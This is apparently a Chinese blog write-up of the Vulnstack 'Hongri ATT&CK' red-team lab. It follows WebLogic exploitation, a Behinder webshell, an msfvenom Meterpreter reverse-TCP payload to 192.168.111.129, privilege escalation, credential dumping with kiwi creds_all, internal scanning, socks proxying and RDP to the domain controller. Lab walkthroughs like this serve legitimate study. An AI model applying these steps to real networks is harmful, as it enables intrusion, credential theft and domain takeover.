红日ATT&CK红队实战(二)

项目拓扑

项目搭建


靶场下载:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

可以参考B站的这位博主:https://www.bilibili.com/video/BV1De4y1a7Ps/?spm_id_from=333.788.recommend_more_video.0&vd_source=90878638385fa3a2c76cf2db16e0a2a5

虚拟机网卡设置:

外网打点


扫描192.168.111.0/24,获取到目标的web主机的ip

扫描开放端口

使用nmap进一步探测端口详细信息

接下来查看web页面信息,首先80端口是一个空白页面,再来看看7001端口,不用探测都该知道是weblogic服务,直接访问console登陆页面,版本号都写在这里了,直接上工具利用即可。

445端口,Windows Server 2008,可以使用永恒之蓝直接攻击(失败一次记得重新再试一下,有惊喜呦),但是打这个容易蓝屏。

其实在看7001端口之前,我想直接通过爆破SQL Server的sa用户密码,从而直接拿到SYSTEM权限的,但是我想多了,没爆破出来。

上传冰蝎的马,OK,上传成功

http://192.168.111.80:7001/bea_wls_internal/shell.jsp

成功拿到webshell

生成攻击载荷,上线Msfconsole

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=1377 -f exe > r.exe

由于windows上线之后一段时间后会话就会断开,所以先使用migrate先来迁移一下进程

内网渗透


首先使用getsystem提升到SYSTEM权限。

抓取主机用户hash

load kiwi  # 加载kiwi模块
creds_all  # 获取域内所有用户的明文密码

抓取域内所有用户的账号和明文密码,这里要迁移到SYSTEM进程才可以

重新切换到de1ay\mssql用户来查看当前用户工作组环境,存在域 DE1AY.COM

想继续使用查询域信息的命令,但是这里显示拒绝,重新切换mssql用户的进程,获取域内主机IP的方法

  1. 查看网卡的DNS服务器IP

  2. 使用net time查看时间,在域中,时间一般以域控为主,再使用ping命令即可定位域控

  3. 使用net view查看域内主机,再结合ping命令获取ip,但是一般权限不允许

上传fscan扫描内网存活主机,使用禁ping扫描内网网段10.10.10.0/24,但是乍一眼一看,都没开3389?

IP地址 名称
10.10.10.201 域主机
10.10.10.10 域控

重新只对3389端口扫了一下,发现端口全都是开启的

连账号密码都破解出来了,接下来就是挂代理上线域控的环节了。

添加路由

横向渗透


使用socks5代理模块,直接运行即可,auxiliary/server/socks_proxy

然后在/etc/proxychains4.conf文件中添加socks5 127.0.0.1 1080即可

这里连接域控的时候,可能会提示 Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).

取消勾选这个就行,我这里是手动到目标机开启的,如果不想手动开启,可以使用psexec等进行横向,效果也是一样的。

posted @ 2023-05-13 17:57  Axion11  阅读(71)  评论(0)    收藏  举报